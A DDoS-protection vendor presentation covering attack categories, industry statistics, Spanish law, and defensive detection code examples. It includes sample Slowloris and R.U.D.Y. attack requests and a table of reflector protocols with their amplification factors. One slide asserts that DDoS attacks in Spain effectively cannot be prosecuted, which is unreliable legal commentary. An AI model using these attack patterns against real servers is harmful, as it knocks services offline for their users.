Security Tools: Prevention, Protection and Mitigation of DDoS Attacks. Alex Lopez [email protected] +34 676 99 5439; Ferran Orsola [email protected] +34 616 472 433

Prevention, Protection and Mitigation of DDoS Attacks



  • Arbor - a Trusted & Proven Vendor Securing the World's Largest and Most Demanding Networks

    90%: percentage of the world's Tier 1 service providers who are Arbor customers

    115: number of countries with Arbor products deployed

    35,7 Tbps: amount of global traffic monitored by the ATLAS security intelligence initiative right now (25% of global Internet traffic!)

    #1: Arbor market position in the Carrier, Enterprise and Mobile DDoS equipment market segments (61% of total market) [Infonetics Research, Dec 2013]

    14: number of years Arbor has been delivering innovative security and network visibility technologies & products

    $16B: 2011 GAAP revenues [USD] of Danaher, Arbor's parent company, providing deep financial backing

  • Agenda

    Smart. Secure. Available.

    What is DDoS?

    Attack Techniques

    Defense Techniques

    War Games

  • What is DDoS?

    What is a DDoS attack? How does DDoS work? Who launches DDoS, and why? What types of attacks exist? Am I already protected?

  • DDoS?

  • What do I need to defend against?

    1 State-sponsored espionage, 2 DDoS, 3 Cloud security, 4 Password management, 5 Sabotage, 6 Botnets, 7 Insider threat, 8 Mobility, 9 Internet, 10 Privacy laws

  • Today's enterprise security pains

    Service availability / DDoS / Botnets / Cloud services protection / Defacement / Big Data

    Data loss / Data breach / Injections / APT / Zero days / Malicious insiders / Account hijacking / Malware / Espionage / Phishing / Mobility / BYOD

  • What is DoS and DDoS?

    In computing, a denial-of-service attack (DoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the efforts of one or more people to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

    A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

  • How does a DDoS attack work?

    During a Distributed Denial of Service (DDoS) attack, compromised hosts or bots coming from distributed sources overwhelm the target with illegitimate traffic so that the servers cannot respond to legitimate clients.

  • The art of DDoS

  • The art of DDoS

  • Arbor + Google = www.digitalattackmap.com

  • Why are these attacks happening?

  • Is it difficult/expensive to launch an attack?

    http://www.youtube.com/watch?v=c9MuuW0HfSA

  • Is it difficult/expensive to launch an attack?

  • How does a botnet work?

    Volunteer botnets are much worse than zombie botnets, as host resources are fully focused on the attack. There are botnets reported of up to 30 million computers!! (BredoLab). In Spain, Mariposa, created by DDP, managed to have as many as 12 million infected computers!!

  • Is it a crime to launch a DDoS attack in Spain?

    In this regard, recall the entry into force last 23 December of the new Penal Code, which devotes one of its articles to describing as a crime the conduct that can be identified as a DoS attack, article 264:

    1. Anyone who, by any means, without authorisation and in a serious manner, erases, damages, deteriorates, alters, suppresses or makes inaccessible data, computer programs or electronic documents belonging to others, when the result produced is serious, shall be punished with a prison sentence of six months to two years.

    2. Anyone who, by any means, without being authorised and in a serious manner, obstructs or interrupts the operation of another party's computer system by introducing, transmitting, damaging, erasing, deteriorating, altering, suppressing or making inaccessible computer data, when the result produced is serious, shall be punished with a prison sentence of six months to three years.

    The Data Retention Law 25/2007 says in its article 1: 1. The purpose of this Law is to regulate the obligation of operators to retain the data generated or processed in the course of providing electronic communications services or public communications networks, as well as the duty to hand over such data to authorised agents whenever required of them through the corresponding judicial authorisation, for the purposes of detection, investigation and prosecution of serious crimes contemplated in the Penal Code or in special criminal laws. 2. This Law shall apply to traffic and location data on natural and legal persons and to the related data necessary to identify the subscriber or registered user.

    According to the Penal Code, article 13, serious crimes are those punished with a serious penalty. And serious penalties, article 33.2: Serious penalties are: imprisonment exceeding five years.

    In summary: launching a DDoS attack is a crime but not a severe one; therefore, the SP won't resolve the IP address and therefore it cannot be prosecuted!!

  • Spanish Law for the Protection of Critical Infrastructures

    Consequently, and given the complexity of the matter, its impact on the safety of persons and on the functioning of basic national and international structures, and in compliance with the provisions of Directive 2008/114/EC, it is necessary to draw up a regulation whose purpose is, on the one hand, to regulate the protection of critical infrastructures against deliberate attacks of all kinds (both physical and cyber) and, on the other hand, to define an organisational system for the protection of such infrastructures that brings together the affected Public Administrations and private entities. As a basic component of this system, the Law creates the National Centre for the Protection of Critical Infrastructures as a body assisting the Secretary of State for Security in carrying out the functions entrusted to the latter as the body responsible for the system.

  • DDoS Attack Types: Volumetric

    Volumetric DDoS attacks are designed to saturate and overwhelm network resources, circuits etc. by brute force.

    [Diagram: attack traffic and good traffic arrive through ISP 1, ISP 2 ... ISP n into the ISP; SATURATION occurs on the links in front of the DATACENTER (Firewall, IPS, Load Balancer, Target Applications & Services).]

    Common attacks: TCP Flood, UDP Flood, Packet Flood, DNS Reflection, DNSSec Amplification

  • DDoS Attack Types: State-Exhausting

    State-Exhausting DDoS attacks target stateful security devices. They lead to exhaustion of state, which renders those devices useless.

    [Diagram: attack traffic and good traffic arrive through ISP 1, ISP 2 ... ISP n into the ISP; EXHAUSTION OF STATE occurs at the DATACENTER's Firewall, IPS and Load Balancer, in front of the Target Applications & Services.]

    Common attacks: SYN Flood, RST Flood, FIN Flood, SockStress

  • Does my FW/IDS/WAF protect me from DDoS?

    Existing perimeter security devices focus on integrity and confidentiality but not on availability.

    [Diagram: Information Security Triangle (confidentiality, integrity, availability)]

    Firewalls, including WAFs, help enforce confidentiality: that information and functions can be accessed only by properly authorized parties.

    Intrusion Prevention Systems (IPS) help enforce integrity: that information can be added, altered, or removed only by authorized persons.

    All firewalls and IPS are stateful devices, which are targeted by state-based DoS attacks from botnets!

  • DDoS Attack Types: Application Layer

    Application-Layer DDoS attacks target specific applications (HTTP, SSL, DNS, SMTP, SIP, etc.).

    [Diagram: attack traffic and good traffic arrive through ISP 1, ISP 2 ... ISP n into the ISP and pass the DATACENTER's Firewall, IPS and Load Balancer; EXHAUSTION OF SERVICE occurs at the Target Applications & Services.]

    Common attacks: URL Floods, R-U-Dead-Yet (RUDY), Slowloris, Pyloris, LOIC, HOIC, DNS dictionary attacks

  • The Increases in DDoS Attacks

    Increased Attack Tools: more and more tools available to perform the attacks (LOIC, HOIC, Slowloris, SlowPost)

    Increased Complexity: over a quarter of attacks are now application-based DDoS, mostly targeting HTTP, DNS, SMTP

    Increased Frequency: more than 50% of data center operators are seeing more than 10 attacks per month

    The increased complexity and frequency is driving demand in midsize enterprises.

  • Data Center DDoS Attack and Impact

    83.3% of respondents now see between 1 and 50 attacks per month. The proportion of respondents seeing 0 attacks per month drops from 30% to 5.6%.

    Big rise in the proportion of respondents seeing attacks targeting infrastructure and infrastructure services.

    Operational costs are the main expense for data center operators in dealing with attacks. However, nearly a third experience customer churn or revenue loss due to attacks.

  • DNS Visibility

    81% of respondents operate DNS infrastructure. 19% have NO security team responsible for it: an improvement from 23% last year, but still not good given the criticality of this service.

    Nearly three quarters have good visibility at layers 3/4, but only just over a quarter have layer 7 visibility, which is needed to detect some types of attacks.

  • Attack Size Historic Report & Duration

  • Worldwide Infrastructure Security Report

    Check it out at www.arbornetworks.com/thearbornetworks7thannualworldwideinfrastructuresecurityreport.html

  • What impact has DDoS on my business?

    Source: Gartner Report "Making the Case for DDoS Protection"

  • ... And attacks are unlikely to stop

  • Agenda

    Smart. Secure. Available.

    What is DDoS?

    Attack Techniques: How can I perform a DDoS attack? How difficult is it? Are there tools I can use? Explanations of attacks and tools.

    Defense Techniques

    War Games

  • Detailed attack description

    Traditional DDoS Attacks

    Volumetric Attacks: UDP Flood; ICMP Flood; DNS Attacks (DNS dictionary, DNS Reflection); NTP Attacks

    Connection Attacks: SYN Flood; Fragmentation Attack

    Application Layer Attacks

    Exhaustion of Bandwidth: LOIC

    Exhaustion of Current Sessions: Slowloris; Rudy

    Exhaustion of Memory: Apache Killer; RefRef

    Exhaustion of CPU: THC Attack

  • Update on Traditional DDoS Attacks

  • High Bandwidth Volumetric DDoS

    Description: large volume of traffic in bps and/or pps. Traffic could be spoofed or not spoofed.

    Effect on Network: network links become saturated. Software-based routers, switches, firewalls, ISPs get overwhelmed.

    Effect on Services: legitimate users can't get to services.

    Common Names: Packet flood, UDP flood, TCP flood

  • UDP Floods

    UDP is stateless, making it good for floods of traffic.

    Generation of UDP packets is easy. Stateless implies spoofing source IP addresses is possible. Packet sizes may range from 60 to 1500 bytes.

    High volume of small packets can cause forwarding issues for routers and firewalls and other inline devices.

    1 Mpps @ 60 bytes = 458 Mbps; 1 Mpps @ 1400 bytes = 10 Gbps
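The slide's arithmetic is worth carrying one step further: a 60-byte flood is a few percent of a 10G link in bits, yet it can still exhaust a forwarding device whose ceiling is expressed in packets per second. The following is an added example (not code from the original slides) that relates packet rate, bit rate and link capacity using standard Ethernet framing constants; the 1.5 Mpps device rating used at the end is a constructed, hypothetical figure.

```python
# Added example, not from the original slides: turn "1 Mpps @ 60 byte" into a small
# capacity check that looks at packet rate as well as bit rate. Ethernet layer-1
# constants are standard (IEEE 802.3); the device pps rating is a constructed figure.

PREAMBLE_SFD_BYTES = 8   # 7-byte preamble + 1-byte start-of-frame delimiter
IFG_BYTES = 12           # inter-frame gap, 96 bit times
MIN_FRAME_BYTES = 64     # minimum Ethernet frame, FCS included


def payload_bps(pps, frame_bytes):
    """Bit rate of the frames themselves, the way the slide counts it."""
    return pps * frame_bytes * 8


def wire_bps(pps, frame_bytes):
    """Bit rate actually occupied on the wire: frames are padded to 64 bytes and every
    frame costs a further 20 bytes of preamble, SFD and inter-frame gap."""
    frame = max(frame_bytes, MIN_FRAME_BYTES)
    return pps * (frame + PREAMBLE_SFD_BYTES + IFG_BYTES) * 8


def max_pps(link_bps, frame_bytes):
    """Highest frame rate a link of link_bps can carry at this frame size."""
    frame = max(frame_bytes, MIN_FRAME_BYTES)
    return link_bps / ((frame + PREAMBLE_SFD_BYTES + IFG_BYTES) * 8)


def mebibits_per_second(bps):
    """1024-based megabits; this is how the slide gets 458 Mbps from 480,000,000 bit/s."""
    return bps / 2 ** 20


def flood_impact(pps, frame_bytes, link_bps, device_pps_rating):
    """Fraction of link bandwidth and of a device's packet budget consumed by a flood.
    A flood that is a few percent of link bandwidth can still exhaust a router or
    firewall whose limit is a packets-per-second figure."""
    return {
        "link_bandwidth_fraction": wire_bps(pps, frame_bytes) / link_bps,
        "device_pps_fraction": pps / device_pps_rating,
    }


if __name__ == "__main__":
    small = payload_bps(1_000_000, 60)
    print(f"1 Mpps @ 60 B   = {small:,} bit/s ({mebibits_per_second(small):.0f} Mi bit/s)")
    print(f"1 Mpps @ 1400 B = {payload_bps(1_000_000, 1400) / 1e9:.1f} Gbit/s")
    print(f"10GbE ceiling at 64-byte frames: {max_pps(10e9, 64):,.0f} pps")
    print(flood_impact(1_000_000, 60, 10e9, 1_500_000))
```

The last line of output is the point: the same 1 Mpps flood uses under 7% of the 10G link but two thirds of a device rated for 1.5 Mpps, which is why pps, not only bps, belongs on the capacity plan.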

  • What are Reflection/Amplification Attacks?

    Amplification DDoS Attack: when an attacker makes a relatively small request that generates a larger response/reply. This is true of most (not all) server responses.

    Reflection DDoS Attack: a DDoS attack in which forged requests are sent to a very large number of Internet-connected devices that reply to the requests. Using IP address spoofing, the source address is set to the actual target of the attack, where all replies are sent. Many services can be exploited to act as reflectors.

    A Reflection/Amplification DDoS Attack combines both techniques to create a DDoS attack which is both high-volume and difficult to trace back to its point(s) of origin.

  • Why NTP?

    Abbreviation / Protocol / Port / Amplification Factor / # Abusable Servers

    CHARGEN / Character Generation Protocol / UDP/19 / ~17.75x / tens of thousands (~90K)

    DNS / Domain Name System / UDP/53 / ~160x / millions (~30M)

    NTP / Network Time Protocol / UDP/123 / ~1000x / over one hundred thousand (~128K)

    SNMP / Simple Network Management Protocol / UDP/161 / ~880x / millions (~5M)

  • UDP Floods

    UDP floods can cause jitter and latency, impacting other services like VoIP.

    UDP floods do not generally impact the server (unless DNS) but do impact the infrastructure, causing collateral damage.

    DNS is the primary attack target with UDP. Some attacks use UDP toward typically TCP-based services (HTTP). DNS amplification floods can generate a high rate of large UDP packets.

  • ICMP Flood

    ICMP floods attempt to overwhelm the victim: sources continuously send ICMP packets, and the victim (server) must process all packets and attempt to respond to all of them.

    An ICMP reflection attack sends an echo request to the broadcast IP with the source of the request spoofed to that of the victim.

  • DNS Threats

    Multiple threat vectors against DNS whose impacts include loss of service availability, reduced customer satisfaction, and hurt profitability.

    [Diagram of threat vectors: Client Side Attacks; Server Side Reflective Attacks (DNS servers reflecting toward the attack target); DNS Cache Poisoning Attack (DNS resolvers redirected to phishing servers); DNS Application Layer Attacks against DNS servers: "Root Queries", "Random Queries", "Multiple Queries per Packet", "NXDomain Reflective".]

  • DNS Dictionary Attack

    Attacker requests entries that do not exist in the DNS cache:

    Query: abcd.somedomain.com
    Query: efgh.somedomain.com
    Query: ijkl.somedomain.com
    ...

    Every miss goes through to the DB server behind the DNS cache, which is overwhelmed with lookups, and each answer comes back as NXDomain:

    NXDomain: abcd.somedomain.com
    NXDomain: efgh.somedomain.com
    NXDomain: ijkl.somedomain.com
    ...
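The signature the slide describes is visible in resolver logs: one client, a stream of never-before-seen labels under one zone, almost every answer NXDOMAIN. The following is an added example (not code from the original slides) that scores clients on that pattern over a few constructed log lines; the `client=`/`qname=`/`rcode=` field layout is an assumption rather than any particular resolver's log format.

```python
# Added example, not from the original slides: flag clients whose queries hit the
# cache-miss path with random labels. Log lines are constructed sample data and the
# field layout (t=, client=, qname=, rcode=) is an assumption, not a real resolver format.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r"t=(?P<t>[\d.]+) client=(?P<client>\S+) qname=(?P<qname>\S+) rcode=(?P<rcode>\S+)"
)

SAMPLE_LOG = """\
t=0.10 client=10.0.0.7 qname=abcd.somedomain.com rcode=NXDOMAIN
t=0.11 client=10.0.0.7 qname=efgh.somedomain.com rcode=NXDOMAIN
t=0.12 client=10.0.0.7 qname=ijkl.somedomain.com rcode=NXDOMAIN
t=0.13 client=10.0.0.7 qname=mnop.somedomain.com rcode=NXDOMAIN
t=0.14 client=10.0.0.7 qname=qrst.somedomain.com rcode=NXDOMAIN
t=0.20 client=10.0.0.9 qname=www.somedomain.com rcode=NOERROR
t=0.21 client=10.0.0.9 qname=mail.somedomain.com rcode=NOERROR
t=0.22 client=10.0.0.9 qname=wwww.somedomain.com rcode=NXDOMAIN
t=0.30 client=10.0.0.7 qname=uvwx.somedomain.com rcode=NXDOMAIN
"""


def parse_log(text):
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append({"t": float(m["t"]), "client": m["client"],
                            "qname": m["qname"].lower().rstrip("."), "rcode": m["rcode"]})
    return records


def zone_of(qname, labels=2):
    """Registered zone approximated as the last two labels (good enough for a demo)."""
    return ".".join(qname.split(".")[-labels:])


def nxdomain_stats(records, window_seconds=60.0, now=None):
    """Per client within the window: total queries, NXDOMAIN answers, distinct missed names."""
    if now is None:
        now = max(r["t"] for r in records)
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "names": set()})
    for r in records:
        if now - r["t"] > window_seconds:
            continue
        s = stats[r["client"]]
        s["queries"] += 1
        if r["rcode"] == "NXDOMAIN":
            s["nxdomain"] += 1
            s["names"].add(r["qname"])
    return stats


def suspicious_clients(records, min_nxdomain=5, min_ratio=0.8, window_seconds=60.0):
    """Clients producing many NXDOMAINs and little else. The distinct-name condition
    separates a dictionary attack from one broken client retrying a single typo."""
    flagged = []
    for client, s in nxdomain_stats(records, window_seconds).items():
        ratio = s["nxdomain"] / s["queries"]
        if s["nxdomain"] >= min_nxdomain and ratio >= min_ratio and len(s["names"]) >= min_nxdomain:
            flagged.append(client)
    return sorted(flagged)


def targeted_zones(records, clients):
    """Zones the flagged clients are hammering, for the on-call note or a rate-limit rule."""
    return {zone_of(r["qname"]) for r in records if r["client"] in clients and r["rcode"] == "NXDOMAIN"}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    bad = suspicious_clients(recs)
    print("suspicious:", bad, "zones:", targeted_zones(recs, bad))
```

Per-client NXDOMAIN ratio is the cheap first cut; response-rate limiting on the authoritative side and a negative cache on the resolver are the usual mitigations once a client is confirmed.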

  • DNS Amplification Attack

    [Diagram: Attacker (a), Victim (v), Resolver (r)]

    A botnet with as few as 20 DSL-connected homes (1 Mbps upstream each) can generate 1.5 Gbps of attack traffic with DNS reflective amplification attack vectors such as those employed for the root server attacks in early 2006 (1:76 amplification factor). Most enterprises have little more than 155 Mbps Internet connectivity.

    Source IP of the victim (v) is spoofed when the query is sent to the resolver; the resolver receives it and responds to v. A 55-byte query elicits a 4200-byte response.
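Two things a defender wants from this slide: the arithmetic behind "20 homes become 1.5 Gbps", and a way to recognise reflected traffic on the wire, where the tell is a reply from a well-known reflector port that nobody on our side ever queried. The following is an added example (not code from the original slides): the amplification factors are the ones in the "Why NTP?" table above, and the flow records are constructed sample data with an assumed field layout.

```python
# Added example, not from the original slides. Amplification factors come from the
# slide's table; the flow records are constructed sample data (direction is relative
# to our network, 203.0.113.10 is our host) and their field layout is an assumption.

REFLECTOR_PORTS = {19: "CHARGEN", 53: "DNS", 123: "NTP", 161: "SNMP"}
AMPLIFICATION = {19: 17.75, 53: 160.0, 123: 1000.0, 161: 880.0}


def amplification_factor(request_bytes, response_bytes):
    return response_bytes / request_bytes


def reflected_bps(bot_count, upstream_bps_each, factor):
    """Volume arriving at the victim when every bot's upstream is spent on spoofed
    requests that reflectors answer with `factor` times more bytes."""
    return bot_count * upstream_bps_each * factor


def upstream_needed_bps(victim_link_bps, factor):
    """Attacker upstream that suffices to fill the victim's link at this factor."""
    return victim_link_bps / factor


def unsolicited_reflector_replies(flows, window_seconds=2.0):
    """An inbound UDP flow from a reflector port is legitimate only if we sent a query
    to that (ip, port) shortly before; otherwise someone spoofed our address at it."""
    outbound = [(f["t"], f["dst"], f["dport"]) for f in flows if f["direction"] == "out"]
    flagged = []
    for f in flows:
        if f["direction"] != "in" or f["sport"] not in REFLECTOR_PORTS:
            continue
        solicited = any(d == f["src"] and p == f["sport"] and 0 <= f["t"] - t <= window_seconds
                        for t, d, p in outbound)
        if not solicited:
            flagged.append(f)
    return flagged


def reflected_volume_bytes(flows):
    return sum(f["bytes"] for f in unsolicited_reflector_replies(flows))


# Constructed sample: one real DNS lookup and its answer, then NTP replies (100 x ~468
# bytes, the size the NTP slide quotes) and a 4200-byte DNS answer we never asked for.
SAMPLE_FLOWS = [
    {"t": 0.0, "direction": "out", "src": "203.0.113.10", "sport": 51000,
     "dst": "198.51.100.5", "dport": 53, "bytes": 55},
    {"t": 0.1, "direction": "in", "src": "198.51.100.5", "sport": 53,
     "dst": "203.0.113.10", "dport": 51000, "bytes": 120},
    {"t": 5.0, "direction": "in", "src": "198.51.100.77", "sport": 123,
     "dst": "203.0.113.10", "dport": 80, "bytes": 46800},
    {"t": 5.0, "direction": "in", "src": "198.51.100.78", "sport": 123,
     "dst": "203.0.113.10", "dport": 80, "bytes": 46800},
    {"t": 5.1, "direction": "in", "src": "198.51.100.9", "sport": 53,
     "dst": "203.0.113.10", "dport": 33000, "bytes": 4200},
]

if __name__ == "__main__":
    f = amplification_factor(55, 4200)
    print(f"factor {f:.0f}x; 20 bots x 1 Mbps -> {reflected_bps(20, 1e6, round(f)) / 1e9:.2f} Gbps")
    print(f"upstream to fill 155 Mbps at that factor: {upstream_needed_bps(155e6, round(f)) / 1e6:.1f} Mbps")
    print("unsolicited reflector replies:", [x["src"] for x in unsolicited_reflector_replies(SAMPLE_FLOWS)])
```

The stateful check is what a firewall does for UDP "connections"; the value of writing it out is seeing why the fix has to be upstream: by the time these replies reach the edge the link is already full, which is the argument for ISP-side filtering and for BCP 38 egress filtering at the networks the bots sit in.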

  • What is NTP?

    NTP = Network Time Protocol. Used for clock synchronization between networked devices. One of the oldest protocols, in operation since the mid-1980s. User Datagram Protocol (UDP) on port number 123. Current version is NTPv4 (RFC 5905). A hierarchical, semi-layered system of time sources called strata, where the number represents the distance from the reference clock.

    NTP is the mechanism that synchronizes the clock on your laptop, smartphone, tablet, and network infrastructure devices.

  • NTP Reflection Attack

    [Diagram] Attacker sends monlist, showpeers, or other NTP level 6/7 administrative queries to abusable NTP servers, with the target port and the spoofed IP address of the target.

    Target port: UDP/80 or UDP/123

    NTP services reply to the attack target with streams of ~468-byte packets sourced from UDP/123 to the target; the destination port is the source port the attacker chose while generating the NTP queries.

  • Connection Based Attacks

    Description: attackers create many connections to the service, sending no traffic or infrequent traffic. Sometimes the attacker may send incomplete requests to the service.

    Effect on Network: available connections to the service are exhausted. State tables of FW, IPS, load balancers could also get overwhelmed.

    Effect on Services: legitimate users can't get to services.

    Common Names: Sockstress

  • Connection Attacks

    Description: attacks that maintain a large number of either open TCP connections or fully open idle connections, impeding new connections from forming on the victim.

    Common names: TCP Idle attack

  • SYN Flood

    SYN flood attempts to exhaust the server side resources for TCP connections.

    Source(s) continuously send packets with just the SYN bit set. Victim (server) must open a connection and send a SYN-ACK back to the source. Connection is kept open.

    [Diagram: in a normal handshake the source ACKs, data is exchanged and the source terminates the connection; in the flood the ACK never arrives and the server times out the connection.]

    SYN packets are typically small in size.
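The shape of a SYN flood in a packet capture is exactly what the slide lists: handshakes that start and never finish, from many sources at once. The following is an added example (not code from the original slides) that tracks half-open handshakes per server over a few constructed packet-log lines; the log format is an assumption made for the example.

```python
# Added example, not from the original slides: spot a SYN flood in a packet log by
# counting, per destination, handshakes that start (SYN) but never complete (no ACK
# from the same client), and the number of distinct sources doing it.
# Log lines are constructed sample data; their format is an assumption.
import re
from collections import defaultdict

PKT_RE = re.compile(
    r"t=(?P<t>[\d.]+) (?P<src>[\d.]+):(?P<sport>\d+) > (?P<dst>[\d.]+):(?P<dport>\d+) flags=(?P<flags>[A-Z]+)"
)

# One legitimate client (10.0.0.5) completes its handshake; five others send SYN only.
SAMPLE_PACKETS = """\
t=0.000 10.0.0.5:40001 > 192.0.2.10:80 flags=S
t=0.001 192.0.2.10:80 > 10.0.0.5:40001 flags=SA
t=0.002 10.0.0.5:40001 > 192.0.2.10:80 flags=A
t=1.000 198.51.100.1:1025 > 192.0.2.10:80 flags=S
t=1.000 198.51.100.2:1025 > 192.0.2.10:80 flags=S
t=1.000 198.51.100.3:1025 > 192.0.2.10:80 flags=S
t=1.001 192.0.2.10:80 > 198.51.100.1:1025 flags=SA
t=1.001 192.0.2.10:80 > 198.51.100.2:1025 flags=SA
t=1.001 192.0.2.10:80 > 198.51.100.3:1025 flags=SA
t=1.002 198.51.100.4:1025 > 192.0.2.10:80 flags=S
t=1.002 198.51.100.5:1025 > 192.0.2.10:80 flags=S
"""


def parse_packets(text):
    packets = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            packets.append({"t": float(m["t"]), "src": m["src"], "sport": int(m["sport"]),
                            "dst": m["dst"], "dport": int(m["dport"]), "flags": m["flags"]})
    return packets


def half_open_flows(packets):
    """Handshakes that started with a client SYN and never saw the client's final ACK.
    Keyed client->server, so the server's SYN-ACK (reverse key) does not count."""
    started, completed = {}, set()
    for p in packets:
        key = (p["src"], p["sport"], p["dst"], p["dport"])
        if p["flags"] == "S":
            started.setdefault(key, p["t"])
        elif "A" in p["flags"] and "S" not in p["flags"] and key in started:
            completed.add(key)
    return {k: t for k, t in started.items() if k not in completed}


def syn_flood_verdict(packets, min_half_open=3, min_sources=3):
    """Per server: True when many half-open handshakes come from many distinct sources,
    the slide's SYN flood shape, as opposed to one misbehaving client."""
    per_server = defaultdict(lambda: {"half_open": 0, "sources": set()})
    for (src, sport, dst, dport) in half_open_flows(packets):
        s = per_server[(dst, dport)]
        s["half_open"] += 1
        s["sources"].add(src)
    return {server: (s["half_open"] >= min_half_open and len(s["sources"]) >= min_sources)
            for server, s in per_server.items()}


if __name__ == "__main__":
    pk = parse_packets(SAMPLE_PACKETS)
    print(f"half-open handshakes: {len(half_open_flows(pk))}")
    print("verdict:", syn_flood_verdict(pk))
```

In a live capture the thresholds would be far higher and time-windowed; the structural point is that the server's own SYN-ACKs must not be mistaken for completed handshakes. On the mitigation side, SYN cookies (Linux `net.ipv4.tcp_syncookies`) let a host answer SYNs without allocating state until the third packet arrives, which is exactly the resource this attack targets.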

  • TCP Stack Attack: SYN Attack

  • Fragmentation Attacks

    Description: a flood of TCP or UDP fragments is sent to a victim, overwhelming the victim's ability to re-assemble the streams and severely reducing performance. Fragments may also be malformed in some way. May be a result of a network mis-configuration.

    Common names: Teardrop, Targa3, Jolt2, Nestea

  • Update on Application Layer Attacks

  • Application Layer Attacks

    Application layer attacks focus on exhausting resources of the target in order to collapse it and take it down.

    We can classify the attacks in groups: Exhaustion of bandwidth: HTTP flood attacks, HTTP POST attacks, LOIC and variants. Exhaustion of concurrent sessions: Slowloris, SlowPost, nkiller2, recoil. Exhaustion of memory: ApacheKiller. Exhaustion of CPU: SSL renegotiation, RefRef.

  • Exhaustion of Bandwidth

    These attacks correctly follow the TCP and HTTP protocols (handshake, distribution of packets).

    The volume of attack per source is not very large, and therefore they need multiple attackers at the same time.

    Since HTTP responses are much bigger than requests, a minimal amount of upload bandwidth consumes a lot of download bandwidth.

    Depending on the volume of the attack, these attacks can be easily detected by network-based DDoS solutions.

  • Exhaustion of Bandwidth: LOIC

    Waits for answers and responds to digests. Can use GZIP. Can add payloads to the packets. Can randomly change the request to hide itself.

    Used by Anonymous. Modes: Manual; IRC with botnets.

    Attacks: TCP Flood, UDP Flood, HTTP Flood

  • Exhaustion of Current Sessions

    Also known as Low and Slow attacks. Allows a single machine to take down a web server with minimal bandwidth and side effects on unrelated services and ports. Designed to hold open as many connections as possible to the HTTP server and abuse them by handling HTTP request headers ssslooowly.

    Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.

    Low & Slow attacks have a high impact and relatively low bandwidth usage.

    It is pretty hard to detect these low-rate attacks with a solution based on traffic baselines and NetFlow.

  • Exhaustion of Current Sessions: Examples

    Slowloris: uses HTTP GET requests, but the HTTP header portion is never completed. The Slowloris process opens several connections to the target web server and sends a partial request: one not ending with a \n line. This tells the web server to hold on: the rest of the GET request is on its way.

    Rudy: uses HTTP POST requests; the HTTP header portion is complete and sent in full to the web server. Abuses HTTP web form fields by iteratively injecting one custom byte into a web application POST field and going to sleep. Application threads become zombies awaiting the ends of the posts until death lurks upon the website.

  • Exhaustion of Current Sessions: Slowloris

    GET http://www.google.com/ HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0
    Content-Length: 42
    X-a: b
    X-a: b
    X-a: b
    X-a: b
    X-a: b
    X-a: b
    X-a: b

  • Exhaustion of Current Sessions: R.U.D.Y.

    POST http://victim.com/
    Host: victim.com
    Connection: keep-alive
    Content-Length: 1000000
    User-Agent: Mozilla/5.0
    Cookie: __utmz=181569312.1294666144.1.1

    Username=A AAAAAAAAAAA
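Both requests above are harmless individually; what makes them an attack is that the server waits indefinitely for them to finish. The defence is a per-connection watchdog of the kind Apache's mod_reqtimeout implements: headers must complete within a deadline, and a declared request body must keep arriving above a minimum rate. The following is an added example (not code from the original slides or from Apache) that applies those two rules to constructed connection records mirroring the Slowloris and R.U.D.Y. requests; the thresholds are illustrative assumptions.

```python
# Added example, not from the original slides: a server-side watchdog that classifies
# open connections the way mod_reqtimeout-style limits do. Connection records are
# constructed to mirror the Slowloris and R.U.D.Y. requests; thresholds are assumptions.
from dataclasses import dataclass


@dataclass
class Connection:
    peer: str                       # "ip:port" of the client
    opened_at: float                # seconds
    headers_complete: bool = False  # saw the blank line that ends the header block
    content_length: int = 0         # declared body size once headers are complete
    body_received: int = 0


def classify(conn, now, header_deadline=20.0, min_body_rate=500.0):
    """Return 'ok', 'slow-headers' or 'slow-body'.
    Slowloris never completes the headers; R.U.D.Y. completes them, declares a huge
    Content-Length and then trickles bytes far below min_body_rate (bytes/second)."""
    age = now - conn.opened_at
    if not conn.headers_complete:
        return "slow-headers" if age > header_deadline else "ok"
    outstanding = conn.content_length - conn.body_received
    if outstanding > 0 and age > 0 and conn.body_received / age < min_body_rate:
        return "slow-body"
    return "ok"


def sweep(connections, now, **limits):
    """Connections the server should close now, with the reason."""
    verdicts = {c.peer: classify(c, now, **limits) for c in connections}
    return {peer: v for peer, v in verdicts.items() if v != "ok"}


def per_source_count(connections):
    """Second signal from the slide: low-and-slow tools hold hundreds of connections
    open from a single machine, so a per-IP concurrent-connection cap also helps."""
    counts = {}
    for c in connections:
        ip = c.peer.rsplit(":", 1)[0]
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample at t=90 s: a normal keep-alive client; a Slowloris-style connection
# still sending "X-a: b" lines with no end of headers; a R.U.D.Y.-style POST that declared
# 1,000,000 bytes and delivered 9; and a second Slowloris socket from the same host.
SAMPLE = [
    Connection(peer="10.0.0.8:51234", opened_at=0.0, headers_complete=True),
    Connection(peer="198.51.100.20:40000", opened_at=0.0, headers_complete=False),
    Connection(peer="198.51.100.21:40001", opened_at=0.0, headers_complete=True,
               content_length=1_000_000, body_received=9),
    Connection(peer="198.51.100.21:40002", opened_at=0.0, headers_complete=False),
]

if __name__ == "__main__":
    print(sweep(SAMPLE, now=90.0))
    print(per_source_count(SAMPLE))
```

The rate rule matters more than the deadline for R.U.D.Y.: a fixed body timeout can always be outlasted by sending one more byte, whereas a minimum bytes-per-second rate cannot be satisfied by trickling.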

  • Exhaustion of Memory Attacks

    The target of the attack is to overwhelm the server by using a lot of memory to make it crash.

    These kinds of attacks focus on some web application server/solution and abuse some vulnerabilities.

    Many botnets already include these kinds of attacks, multiplying the effect of the attack.

    These attacks are oriented to applications such as Apache, WordPress & Joomla servers.

    The server normally goes down in less than 2 minutes.

  • Exhaustion of Memory Attacks: Examples

    ApacheKiller: vulnerability originally discovered by Michal Zalewski of Google. The attack exploits a vulnerability in the way Apache handles requests based on "Range". If sent to servers running Apache 1.3 and 2, byte ranges containing multiple overlapping requests can consume all the memory of those servers.

